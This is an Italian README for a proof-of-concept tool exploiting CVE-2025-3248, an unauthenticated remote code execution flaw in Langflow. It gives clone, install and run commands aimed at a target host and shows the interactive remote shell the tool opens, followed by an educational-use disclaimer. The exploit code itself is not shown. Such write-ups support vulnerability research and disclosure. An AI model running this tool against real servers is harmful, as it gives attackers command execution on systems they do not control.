
Exploit per Langflow AI - Esecuzione Remota di Codice (Senza Autenticazione)
Questo exploit sfrutta una vulnerabilità critica di RCE non autenticata (CVE-2025-3248) in Langflow AI. La vulnerabilità consente a un attaccante di eseguire comandi arbitrari sul server di destinazione tramite l'endpoint /api/v1/validate/code.
Questo strumento proof-of-concept (PoC) fornisce una shell interattiva per testare e dimostrare il problema.
pip3 per installare le dipendenzegit clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
Ti verrà presentata una shell interattiva:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit o quitQuesto progetto è concesso in licenza con la MIT License — consulta il file LICENSE per i dettagli.
Questo software è fornito solo a scopo educativo e di ricerca. L'autore non si assume alcuna responsabilità per un uso improprio di questo codice. Utilizzare solo su sistemi di propria proprietà o per i quali si ha esplicita autorizzazione al test.